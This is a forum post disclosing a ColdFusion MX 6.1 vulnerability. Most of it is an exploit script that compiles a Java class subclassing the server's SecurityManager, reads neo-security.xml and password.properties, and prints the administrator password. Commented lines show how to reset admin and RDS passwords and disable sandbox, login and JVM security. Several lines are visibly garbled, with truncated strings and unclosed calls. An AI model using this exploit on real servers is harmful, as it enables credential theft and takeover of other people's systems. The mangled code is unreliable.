Macromedia ColdFusion MX 6.1 vulnerability

By JorgeIvan
in General Discussion

 Share

Recommended Posts

Grand Master

JorgeIvan

Posted
Posted (edited)

There is a vulnerability in the ColdFusion MX 6.1 product. To exploit this, a user needs access to create a cold fusion template on a ColdFusion server with CreateObject or cfobject tags enabled. The code given below writes a java class to the ColdFusion lib directory which allows writing by default. This code compiles the java file, but there are other ways to write the class file if the compiler class is not available. Once the class is written, it can be accessed by CF and all methods exposed. A user can do a variety of things like getting the administrator password. Code and examples are given below.

  Quote
Software: Macromedia ColdFusion MX 6.1

Platform Tested: Windows/Linux

Version Tested: ColdFusion MX 6.1

<cfscript>

objFileWriter = CreateObject("java","java.io.FileWriter");

objByteArray = CreateObject("java","java.io.ByteArrayOutputStream");

objJavaC = CreateObject("java","sun.tools.javac.Main");

objString = CreateObject("java","java.lang.String");

objFile = CreateObject("java","java.io.File");

if (Server.Os.Name IS "Windows") { s = "\"; } else { s = "/"; }

strJavaSource = "#Server.ColdFusion.Rootdir##s#lib#s#SecurityExploit.java";

strCfusionJar = "#Server.ColdFusion.Rootdir##s#lib#s#cfusion.jar";

strNeoSecFile = "#Server.ColdFusion.Rootdir##s#lib#s#neo-security.xml";

strPasswdFile = "#Server.ColdFusion.Rootdir##s#lib#s#password.properties";

fileWriter = objFileWriter.init("#strJavaSource#",false

fileWriter.write("importfusion.security.SecurityManager;");

fileWriter.write("importjavajava.io.File;");

fileWriter.write("publics SecurityExploit extends SecurityManager {");

fileWriter.write("publicrityExploit(File arg0, File arg1) {");

fileWriter.write("super(arg01); }");

fileWriter.write("publicean isAdminSecurityEnabled(){");

fileWriter.write("returne;}}");

fileWriter.flush();

fileWriter.close();

str = objString.init("-classpath,#strCfusionJar#,#strJavaSource

strArr = str.split(",");

byteArray = objByteArray.init();

compileObj =objJavaC.init(byteArray,str);

compileObj.compile(strArr);

obj = CreateObject("java","SecurityExploit");

file1 = objFile.init("#strNeoSecFile

file2 = objFile.init("#strPasswdFile

obj.init(file1,file2);

obj.load();

</cfscript>

<cfscript>

// Get Administrator Password

strAdminPw = obj.getAdminPassword();

// Set Administrator Password

//obj.setAdminPassword("test123");

// Turn off Sandbox Security

//obj.setSandboxSecurityEnabled(false);

// Turn off Administrator Login

//obj.setAdminSecurityEnabled(false);

// Turn off RDS Login

//obj.setRdsSecurityEnabled(false);

// Set RDS Password

//obj.setRdsPassword("test123");

// Turn off JVM Security

//obj.setJvmSecurityEnabled(false);

</cfscript>

<cfoutput>Adminstrator Password: #strAdminPw#</cfoutput>

Edited by jorgeivan2k3
This topic is now closed to further replies.
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.